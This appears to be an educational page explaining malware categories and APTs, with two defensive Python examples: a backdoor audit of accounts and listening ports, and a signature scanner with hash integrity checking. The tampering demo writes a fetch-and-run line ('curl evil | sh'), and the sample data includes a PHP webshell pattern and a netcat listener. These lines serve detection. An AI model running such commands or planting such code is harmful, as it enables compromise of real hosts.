Malicious Code (Malware)

Malware is the shortened term for malicious software: code written to cause harm, steal data, or give an attacker control over a system. Malware gains access to a system in myriad ways, usually without the consent or knowledge of the user. The most common vectors are portable storage devices and Internet communications such as email, web downloads, and social media. A wide range of malware exists, including viruses, worms, Trojan horses, keystroke loggers, spyware, adware, rootkits, logic bombs, trapdoors and backdoors, dialers, URL injectors, and exploits. The number of unique malicious code samples is astounding. Recent research on malware attacks has estimated the potential number of unique signatures (strings of code used to detect and identify specific malware, much like a fingerprint) in the billions, a huge increase from the more than 17 million unique signatures Symantec reported less than 10 years ago.

Just like a biological virus, a computer virus needs a host object to infect. Most viruses infect files, such as executables, device drivers, dynamic link libraries (DLLs), system files, and sometimes even document files (typically through embedded macros), audio, video, and image files. Some viruses infect the boot sector of a storage device, including hard drives and USB drives, so that they run before the operating system loads. Viruses spread through the actions of users: as users open infected files, the virus copies itself into other files, and as users send infected files to other systems, the virus spreads there as well.

Unlike viruses, which spread from file to file, worms spread from system to system. Because human interaction isn’t necessary for propagation, worms can (and do) spread much more quickly than viruses, and many threats casually described as viruses are actually worms. Attackers design worms around a specific flaw in a network-reachable service. The worm scans other systems for that flaw, exploits it to gain access to a new victim, and once running there repeats the process. Worms can also act as carriers, depositing other forms of malicious code on each host as they multiply across networked systems.

A Trojan horse is a mechanism of distribution or delivery more than a specific type of malware. During the Trojan War, the Greeks built a huge, hollow wooden horse, hid warriors inside, left the horse before the gates of Troy, and seemingly departed. The Trojans took the horse into their citadel and were massacred overnight when the Greek warriors emerged from hiding. In computing, the term refers to a malicious payload embedded within a seemingly benign carrier or host program that the user wanted, such as a game or video clip, and intentionally downloaded or copied. When the user runs the host program, the malicious payload runs along with it.

The gimmick of a Trojan is fooling someone into accepting the program as safe, which is a form of social engineering. Any program can be turned into a Trojan by embedding malware inside it, in the same way that any food can be poisoned by adding a toxic substance to it. In fact, attackers have specialized tools built for exactly this purpose, called wrappers (or binders) or Trojan construction kits, which bundle a malicious payload with a legitimate executable so that both run when the combined file is launched.

Keystroke loggers record the keyboard activity of a user. Attackers can deposit software keystroke loggers onto a victim’s system through a variety of techniques, including a worm or a Trojan. Once a system is infected, the keystroke logger periodically transmits its key logs to the attacker through email, File Transfer Protocol (FTP), instant messaging (IM), or an HTTP connection to a server the attacker controls. Hardware keystroke loggers are small devices inserted inline between the keyboard cable and the computer, or built into a replacement keyboard. They are hard to detect because the device is very small and sits where users rarely look, usually below the desk or behind the computer, and because no software runs on the host for a scanner to find.

Spam email is often used to perpetrate phishing attacks, in which an unsolicited message is crafted to appear legitimate or enticing so that the recipient opens an attachment or clicks a link, thereby launching malware on their system or handing their credentials to a spoofed site.

Spyware extends keystroke logging to monitor and record many other user activities. Spyware varies greatly, but it can collect a list of applications launched, URLs visited, email sent and received, chats sent and received, the names of all files opened, recordings of network activity, periodic screen captures, and even audio from a microphone or images from a webcam.

Adware pushes unwanted advertisements onto the user. Spyware and adware are often linked in a symbiosis: the information spyware gathers about a target helps select the material the adware will push. Adware can deliver advertisements as pop-ups, as email messages, or by replacing legitimate ads on websites as each page is rendered in the browser.

Rootkits are malicious camouflage that function as invisibility shields for anything an attacker wants to hide on a computer. A kernel-mode rootkit typically loads as a device driver or kernel module and hooks the kernel’s own functions (the system call table, for example) between user programs and the hardware, so that the directory listings, process lists, and network tables the OS returns silently omit the attacker’s files, processes, and connections. User-mode rootkits achieve a similar effect by hooking the APIs that applications call. Rootkits hide other forms of malware or hacker tools and often bundle additional malicious functions with their stealth abilities. Because the running OS itself is lying, rootkits are best detected by comparing views: scanning the disk from clean boot media, or comparing what different enumeration methods report, rather than trusting the infected system’s own tools.

A logic bomb is an electronic land mine. Once an attacker embeds a logic bomb in a system, it remains dormant until a triggering event takes place. The trigger could be a specific date and time, the launching of a program, the typing of a specific keyword, or access to a specific URL. Once the trigger occurs, the logic bomb springs its malicious action on the unsuspecting user.

Trapdoor and backdoor are two terms for the same type of malware: a program that opens an access pathway so that an attacker can easily get back into a compromised system. Backdoors are commonly delivered by the Trojan horse method, and unlike malware such as ransomware or a worm, whose effects soon become obvious, a backdoor’s value depends on its remaining hidden. The access could be a new user account with credentials the attacker has defined; a rogue web, Telnet, or Secure Shell (SSH) server that gives the attacker a remote command prompt; or a channel that enables full remote control over the victim’s machine (sometimes simply by enabling Remote Desktop on a Windows host). Many other trapdoor or backdoor manipulations can grant access to external attackers.
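The two most common backdoor artifacts named above, an attacker-created account and a rogue listening service, are cheap to audit. The following is an added example written for this page, not code from the original text: it parses a constructed /etc/passwd and a constructed `ss -lntp` listing and reports UID 0 accounts other than root, unknown accounts with an interactive shell, and listeners absent from a baseline. The baseline sets `KNOWN_ACCOUNTS` and `ALLOWED_LISTENERS` are assumptions for the example; on a live host you would feed the functions the real files and command output.

```python
"""Audit account and listener data for the backdoor indicators described above."""
import re

# Constructed sample of /etc/passwd. 'sysadm' is a second UID 0 account and
# 'support' is an unknown account that was given a login shell.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm:x:0:0::/root:/bin/bash
support:x:1001:1001::/home/support:/bin/sh
"""

# Constructed sample in the format of `ss -lntp`: a netcat listener on 4444
# and a second sshd instance on 2222 that the baseline does not know about.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=955,fd=6))
LISTEN  0       1       0.0.0.0:4444         0.0.0.0:*          users:(("nc",pid=2231,fd=3))
LISTEN  0       128     0.0.0.0:2222         0.0.0.0:*          users:(("sshd",pid=2290,fd=3))
"""

# Baseline of what the host is supposed to have (assumed values for this example).
KNOWN_ACCOUNTS = {"root", "daemon", "sshd", "alice"}
ALLOWED_LISTENERS = {(22, "sshd"), (80, "nginx")}


def parse_passwd(text):
    """Yield (name, uid, shell) for each well-formed /etc/passwd line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        yield fields[0], int(fields[2]), fields[6]


def audit_accounts(passwd_text, known=KNOWN_ACCOUNTS):
    """Return a list of (account, reason) findings."""
    findings = []
    for name, uid, shell in parse_passwd(passwd_text):
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        elif name not in known and not shell.endswith(("nologin", "false")):
            findings.append((name, f"unknown account with interactive shell {shell}"))
    return findings


# State, Recv-Q, Send-Q, then Local Address:Port, Peer, then the process name.
_SS_LINE = re.compile(r'^LISTEN\s+\S+\s+\S+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)"')


def parse_listeners(ss_text):
    """Yield (port, process) from `ss -lntp` style output."""
    for line in ss_text.splitlines():
        m = _SS_LINE.match(line)
        if m:
            yield int(m.group(2)), m.group(3)


def audit_listeners(ss_text, allowed=ALLOWED_LISTENERS):
    """Return listeners that are not in the allow list as (port, process) pairs."""
    return [(port, proc) for port, proc in parse_listeners(ss_text)
            if (port, proc) not in allowed]


if __name__ == "__main__":
    for account, reason in audit_accounts(SAMPLE_PASSWD):
        print(f"ACCOUNT  {account}: {reason}")
    for port, proc in audit_listeners(SAMPLE_SS):
        print(f"LISTENER port {port} ({proc}) is not in the baseline")
```

The allow list keys on port and process name together, so a second sshd bound to an unexpected port is flagged even though sshd itself is expected. Keep the baseline somewhere the host cannot rewrite, or a backdoor that can edit /etc/passwd can edit the baseline as well.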

A dialer is a rogue program that automatically dials a modem at a predefined number. Sometimes this process auto-downloads additional malware to the victim system or uploads stolen data from the victim. In other cases, the dialer calls premium rate telephone numbers from the victim system to rack up massive long-distance charges. If the user normally connects to the Internet over a dial-up link, the dialer could dial a rogue proxy site instead of the Internet service provider (ISP). This site would act as a man-in-the-middle and then eavesdrop on all communications.

URL injectors replace URLs in HTTP GET requests with alternative addresses, so that a different webpage appears in the browser than the one the user clicked. The replacement pages may present advertising sites, generate traffic to falsify search engine optimization (SEO) rankings, or lead to spoofed sites that harvest credentials.

Exploits are code designed to take advantage of a flaw in programming, timing, communication, or storage. Strictly speaking an exploit is a means of entry rather than malware in itself, and attackers often embed exploits into other forms of malware to assist in infection and distribution. Exploits also exist independently, usually as tools attackers use to gain a foothold, cause damage, and perform intrusions.

Malware spreads through the same communication channels as legitimate, benign data; the difference is that it is designed to cause distress and destruction. A growing area of risk is mobile code: software designed to be transmitted across a network, such as the Internet or a mobile phone network, and executed on the receiving host without a separate installation step, as browser scripts, applets, and document macros are. Because the host runs it automatically, mobile code is an attractive carrier, and malware disguised as mobile code is spreading more rapidly than ever. The general population, and even IT professionals, need to be more aware, take proper precautions, and use anti-malware applications.

Advanced Persistent Threat

For many years, it was common for the general public, and even many knowledgeable security professionals, to call every type of malware a virus. It has become just as common for every type of malware to be called an advanced persistent threat (APT). Although the occurrence of APTs has increased dramatically, they still account for a small percentage of attacks. Strictly speaking, an APT is an adversary rather than a piece of malware: a well-resourced group that gains access to a chosen target and works to keep that access over a long period (hence the term “persistent”), typically using custom tooling that stays quiet on the compromised machines to avoid detection. APTs are highly targeted, with the targeting intelligence often gleaned from other types of attacks, from phishing to social engineering. Historically, most attacks have been opportunistic, seeking the weakest systems to break into: the lowest-hanging fruit. As we see a shift from financially motivated attacks toward state-sponsored espionage and hacktivism (politically motivated hacking), it follows that we are likely to see continued growth in targeted attacks such as APTs.

Even with all the variations of malware that currently exist and those that will exist in the future, you can choose from only a few common defenses: antivirus software, anti-malware scanners, integrity checkers, and user awareness. Antivirus software actively searches for viruses, worms, Trojans, and other similarly destructive forms of malware in memory and on storage devices, largely by matching known signatures and by watching for suspicious behavior. Anti-malware scanners look for spyware, adware, dialers, and so forth that antivirus software might not address. An integrity checker keeps a database of hash values for all system and application files and reports when unauthorized changes occur to those files; that database must be kept where an intruder cannot rewrite it, or the intruder simply updates the hashes along with the files. You can improve user awareness by offering training that encourages responsible action with regard to security. Training will also encourage users to take reasonable precautions against infection and attack both at work and at home. Training should include awareness of what to do and whom to contact, such as the IT team or the helpdesk, to report incidents within an organization.
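The two mechanical defenses described above, signature matching (the “fingerprints” from the opening paragraph) and hash-based integrity checking, are shown below in one added example written for this page, not code from the original text. The signature patterns, the file names, and the tampering steps are all constructed for the example: it builds a baseline of SHA-256 hashes for a scratch directory, modifies one file, drops a file carrying a known pattern, deletes another, and reports the differences together with any signature hits.

```python
"""Minimal signature scanner and hash-based integrity checker (example code)."""
import hashlib
import json
import tempfile
from pathlib import Path

# Signature database: name -> byte pattern. Both patterns are constructed for
# this example; a real scanner would load thousands of vendor-maintained entries.
SIGNATURES = {
    "Example.Dropper": b"\x4d\x5a\x90\x00EXAMPLE_DROPPER",
    "Example.Webshell": b"<?php eval($_POST[",
}


def sha256_file(path, chunk=65536):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_bytes(data, signatures=SIGNATURES):
    """Return the sorted names of every signature found anywhere in data."""
    return sorted(name for name, pattern in signatures.items() if pattern in data)


def scan_file(path, signatures=SIGNATURES):
    return scan_bytes(Path(path).read_bytes(), signatures)


def build_baseline(root):
    """Map relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def save_baseline(baseline, db_path):
    Path(db_path).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(db_path):
    return json.loads(Path(db_path).read_text())


def check_integrity(root, baseline):
    """Compare current hashes with the baseline; report added, removed, modified."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in current
                           if p in baseline and current[p] != baseline[p]),
    }


def run_demo():
    """Baseline a scratch tree, tamper with it, and return (report, signature hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp) / "bin"
        bin_dir.mkdir()
        (bin_dir / "app").write_bytes(b"#!/bin/sh\necho hello\n")
        (bin_dir / "lib.so").write_bytes(b"\x7fELF fake library contents")
        db = Path(tmp) / "baseline.json"          # kept outside the watched tree
        save_baseline(build_baseline(bin_dir), db)

        # Simulated compromise: a Trojaned script, a dropped binary, a deleted library.
        (bin_dir / "app").write_bytes(b"#!/bin/sh\necho hello\ncurl evil | sh\n")
        (bin_dir / "update.exe").write_bytes(b"\x4d\x5a\x90\x00EXAMPLE_DROPPER\x00\x00")
        (bin_dir / "lib.so").unlink()

        report = check_integrity(bin_dir, load_baseline(db))
        hits = {p.name: scan_file(p) for p in bin_dir.iterdir()}
        return report, hits


if __name__ == "__main__":
    report, hits = run_demo()
    print("integrity:", report)
    print("signature hits:", {k: v for k, v in hits.items() if v})
```

The integrity check catches the Trojaned script even though no signature matches it, and the signature scan names the dropped file even though it is new and therefore has no baseline hash; the two defenses cover different gaps. To exercise a real antivirus product rather than this toy scanner, use the EICAR test file, which every vendor detects by agreement.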
